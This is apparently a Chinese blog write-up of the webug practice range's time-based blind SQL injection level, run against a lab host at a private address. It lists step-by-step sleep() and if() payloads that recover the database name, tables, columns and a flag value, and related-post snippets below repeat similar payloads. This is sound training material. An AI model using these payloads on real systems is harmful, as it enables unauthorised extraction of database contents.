webug 3、延时注入

已于 2022-03-15 17:02:08 修改
阅读量3.5k 收藏
点赞数
分类专栏: webug 文章标签: web安全 安全 sql 数据库
于 2022-03-15 10:18:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43973470/article/details/123495611
版权

基于时间盲注,注入SQL语句执行后不提示真假,也不能通过页面内容来进行判断,通过构造SQL语句注入,查看页面响应的时间来判断信息为时间盲注。

思路:首先使用延时注入语句,查看是否可进行延时注入,然后判断数据库长度,数据库名,后面和布尔相似

使用函数:

sleep(),if(true,false),ascii(),substring()

url:http://192.168.31.64/control/sqlinject/bool_injection.php?id=1

判断注入点

http://192.168.31.64/control/sqlinject/bool_injection.php?id=1' and sleep(5) %23
发现网站延迟5秒

判断数据库长度

http://192.168.31.64/control/sqlinject/bool_injection.php?id=1' and if(length(database())=5,sleep(5),1) %23 
发现数据库长度为5

判断数据库名

http://192.168.31.64/control/sqlinject/bool_injection.php?id=1' and if(ascii(substr(database(),1,1))=119,sleep(5),1) %23 	
数据库第一个字母为w
http://192.168.31.64/control/sqlinject/bool_injection.php?id=1' and if(ascii(substr(database(),2,1))=101,sleep(5),1) %23 
数据库第二个字母为e
以此类推,数据库为webug

判断数据库下有几个表

http://192.168.31.64/control/sqlinject/bool_injection.php?id=1' and if((select count(*) from information_schema.tables where table_schema=database())=7,sleep(5),1) %23
数据库下有7张表

判断表名长度

http://192.168.31.64/control/sqlinject/bool_injection.php?id=1' and if((select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=9,sleep(5),1) %23	
第一张表长度为9
http://192.168.31.64/control/sqlinject/bool_injection.php?id=1' and if((select length(table_name) from information_schema.tables where table_schema=database() limit 1,1)=8,sleep(5),1) %23	
第二张表长度为8 
以此类推判断出其他表名的长度

判断表名

判断第一张表名
http://192.168.31.64/control/sqlinject/bool_injection.php?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='webug' limit 0,1),1))=100,sleep(5),1) %23
第一张表的第一个字母为d
以此类推,第一张表名为:data_crud

判断第二张表名

http://192.168.31.64/control/sqlinject/bool_injection.php?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='webug' limit 1,1),1))=101,sleep(5),1) %23
第二张表的第一个字母为e	
http://192.168.31.64/control/sqlinject/bool_injection.php?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='webug' limit 1,1),2))=110,sleep(5),1) %23
第二张表的第二个字母为n
以此类推,第二张表名为:env_list	
以此类推,可以查出各个表名

取flag值
因为flag值在表二中,故查询表二的信息

判断表二中有多少列
http://192.168.31.64/control/sqlinject/bool_injection.php?id=1' and if((select count(column_name) from information_schema.columns where table_name='env_list')=8,sleep(5),1) %23
表二有8列
判断表二中第一个列长度
http://192.168.31.64/control/sqlinject/bool_injection.php?id=1' and if((select length(column_name) from information_schema.columns where table_name='env_list' limit 0,1)=2,sleep(5),1) %23
表二中第一个列长度为2	
判断表二中第一列第一个字母
http://192.168.31.64/control/sqlinject/bool_injection.php?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='env_list' limit 0,1),1))=105,sleep(5),1) %23
表二中第一列第一个字母为i
以此类推为:id		
以此类推,可查出所有列名

Ps:flag值在第6列,所在列名为:envFlag
当id=3时,列名envFlag所取得值为flag值

判断flag值长度

http://192.168.31.64/control/sqlinject/bool_injection.php?id=1' and if((select length(envFlag) from env_list limit 2,1)=9,sleep(5),1) %23		flag值长度为9		
判断flag值第一个字母
http://192.168.31.64/control/sqlinject/bool_injection.php?id=1' and if(ascii(substr((select envFlag from env_list limit 2,1),1))=103,sleep(5),1) %23		flag值第一个字母为g
以此类推,判断出flag值为:gfdgdfsdg
乔木同学
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
webug--延时注入
gclome的博客
05-13 998
延时注入介绍 对于基于时间盲注,通过构造真or假判断条件的sql语句,且sql语句中根据需要联合使用sleep()函数一同向服务器发送请求,观察服务器响应结果是否会执行所设置时间的延迟响应,以此来判断所构造条件的真or假(若执行sleep延迟,则表示当前设置的判断条件为真);然后不断调整判断条件中的数值以逼近真实值,最终确定具体的数值大小or名称拼写。 延时注入我们一般不能从页面直接获取数据库信息,所用知识与第二关基本相同 if(exp,1,sleep(5))如果exp为真,返回1,否则返回sleep(5
SQL注入(延时注入)---zkaq
weixin_38237216的博客
04-11 4796
1.概念 1.延时注入:当进行盲注的时候,无论输入什么payload都会返回正常的处理信息,无法根据正确与错误的payload得到报错信息。这个时候就需要使用特定的时间函数,通过查看web页面的返回时间差来判断 2.常用函数 sleep() :将程序挂起一段时间n为n秒 if(expr1,expr2,expr3) :判断语句;如果第一个语句正确就执行第二个语句如果错误执行第三个语句 2.靶场 1.pass-13—延时注入(一) 通过题目中的sql语句可知,入参是用"闭合的,使用" and 1=1 – q
sql注入延时注入
最新发布
weixin_45653478的博客
04-09 1383
攻击者提交一个对执行时间敏感的SQL语句,通过执行时间的长短来判断注入是否成功。id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),5,1))=114,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),1,1))>97,sleep(5),1)--+ #延时5秒。
MySQL延时盲注
一个普普通通的博客
03-01 1444
Mysql延时盲注
延时注入exp编写
yyj1781572的博客
11-02 263
延时注入也是盲注入的一种,是利用sql语句达到延时的目的,在mysql中用的sleep()函数,select sleep(3)数据库延时3秒返回信息。利用这个函数加上if函数进行判断,就可以达到延时注入注入得出数据。
sql注入-延时注入】sleep()、benchmark()函数 延时注入
07-10 6953
延时注入】结合if、case when 延时注入
07延时分断B3.zip
04-27
PLC专为在工业环境下应用而设计,它采用可编程序的存储器,用来在其内部存储执行逻辑运算、顺序控制、定时、计数和算术运算等操作的指令,并通过数字式、模拟式的输入和输出,控制各种类型的机械或生产过程。...
12 延时注入1
08-03
延迟注入技术详解 延迟注入是一种盲注的手法,通过提交对执行时间铭感的函数 SQL 语句,来判断是否执行成功。其原理是,当条件语句正确时,执行时间会变得很长,而错误时执行时间很短。这种技术可以绕过主流注入...
M3延时函数
04-21
M3延时函数
python3 sleep 延时秒 毫秒实例
09-16
主要介绍了python3 sleep 延时秒 毫秒实例,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
u3d辉光插件延时插件
09-30
在游戏视觉效果的提升中,辉光和延时特效是非常关键的一部分,它们可以显著增强游戏场景的视觉冲击力和沉浸感。辉光效果通常用于模拟光源过强时产生的模糊和扩散现象,而延时效果则可以模拟长时间曝光或慢动作的效果...
Webug4.0靶场通关笔记(第二天)--------延时注入和post注入
Yasso的博客
02-20 791
一、延时注入 延时注入是基于布尔注入的, 简单来说, 是通过if语句返回的真(true)或假(false)来确定是否执行网页延迟响应,当布尔注入不成功时,即不能直接观察页面的返回正常与否来判断sql语句是否执行成功, 我们这时候就可以采用延迟注入。 1.先判断字段数 2.判断数据库(webug) ?id=1’ and if(substr(database(),1,1)=‘w’,1,sleep(5))%23 (判断数据库第一个字母是否为w,是的话页面正常,否则沉睡5秒) ?
SQL注入-06】延时注入案例
m0_64378913的博客
04-26 2563
1 概述 当改变浏览器传给后台SQL的参数后, 浏览器没有显示对应内容也没有显示报错信息时,无法使用union联合查询注入与报错注入;同时,输入参数为真或假也无法从页面显示上查出差异,无法使用布尔注入 ,这时候可以试试看能否使用延时注入延时盲注:也称延时注入时间注入等,这种注入方式在传给后台的参数中,设置了一个if语句,当条件为真时执行sleep语句,条件为假时无执行语句,然后根据浏览器的响应时间来推测sleep语句是否被执行,进而推测if条件是否为真。 延时盲注与布尔盲注的核心思想都是通过浏览器两种
webug 4.0 第三关 延迟注入
ONS_cukuyo的博客
02-28 1869
感谢webug团队一直以来的更新维护! webug是什么 WeBug名称定义为“我们的漏洞”靶场环境基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBugweb环境都装在了一个纯净版的Windows 2003的虚拟机中。 Webug官网:http://www.web...
webug4.0延时注入-3
weixin_33698043的博客
03-17 281
/*打开这道题时,发现和第二关的链接一样。既然作者考察的是延时注入就利用响应时间来判断*/ 用延时注入时,我们一般不能从页面直接获取数据库信息,所用知识与第二关基本相同 if(exp,1,sleep(5))  如果exp为真,返回1,否则返回sleep(5) 就是延时5s响应 0x01  经过尝试发现 'or 1=1--+ 能使页面正常 0x02  利用 'order by 1-...
webug延时注入
我只会装360的博客
10-08 174
通过之前的报错可以得知sql语句 利用sleep()函数构造延时语句,发现页面延迟响应 和布尔注入一样,通过观察页面状态来猜测数据库名、表名等信息 爆当前数据库名 http://192.168.199.143/control/sqlinject/bool_injection.php?id=1’and if(ascii(substr(database(),1,1))>118,1,sleep...
对于192.168.0.0到192.168.0.255这个网络来说,以下说法中正确的是
无鞋童鞋的博客
05-15 8101
技术之瞳 阿里巴巴技术笔试心得习题2.14:   对于192.168.0.0到192.168.0.255这个网络来说,以下说法中正确的是 (D)。   A、网段内可用来作为主机地址的范围是:192.168.0.0到192.168.0.255   B、网络地址是192.168.0.255   C、广播地址是192.168.0.0   D、网段内的主机可以通过网卡对网卡传递数据   E、主机
SQL注入延时注入
热门推荐
秋水的博客
09-01 2万+
延时注入简介 个人理解: 延时注入又称时间盲注,也是盲注的一种。通过构造延时注入语句后,浏览器页面的响应时间来判断正确的数据/ 应用场景: 延时注入的应用场景是,在我们输入and 1或者and 0的时候,页面的返回无变化,这个时候可以通过and sleep(5)来判断一下页面的响应时间,相应时间在五秒多一点的话,说明此处可以使用延时注入 相关函数 延时注入会用到布尔盲注的所有...
mysql sql注入漏洞修复_SQL注入漏洞解析与靶场复现
weixin_36043375的博客
02-26 1190
1. 概述SQL注入(SQL Injectioin)漏洞是注入漏洞中危害性最高的漏洞之一。形成的原因主要是在数据交互过程中,前端的数据传入后端时,没有作严格的验证过滤导致传入的“数据”拼接到了SQL语句中。被数据库当作SQL语句的一部分执行,从而使得数据面临被脱库、恶意破坏篡改甚至造成整个系统权限沦陷等一系列危害。注入攻击的本质是把用户输入的数据当作代码执行。造成注入攻击有两个关键条件:①用户能够...
延时注入的payload有哪些
07-11
延时注入(Delay-Based SQL Injection)是一种攻击技术,利用数据库查询中的延时函数来实现注入恶意代码。以下是一些常见的延时注入Payload示例: 1. 基于`SLEEP()`函数的延时注入: ``` ' OR SLEEP(5)# ``` 上述...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值